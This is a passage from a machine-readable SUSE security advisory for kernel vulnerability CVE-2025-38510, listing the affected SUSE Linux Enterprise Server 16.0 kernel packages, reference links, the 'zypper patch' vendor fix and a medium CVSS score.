"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38510",
"url": "https://www.suse.com/security/cve/CVE-2025-38510"
},
{
"category": "external",
"summary": "SUSE Bug 1248166 for CVE-2025-38510",
"url": "https://bugzilla.suse.com/1248166"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
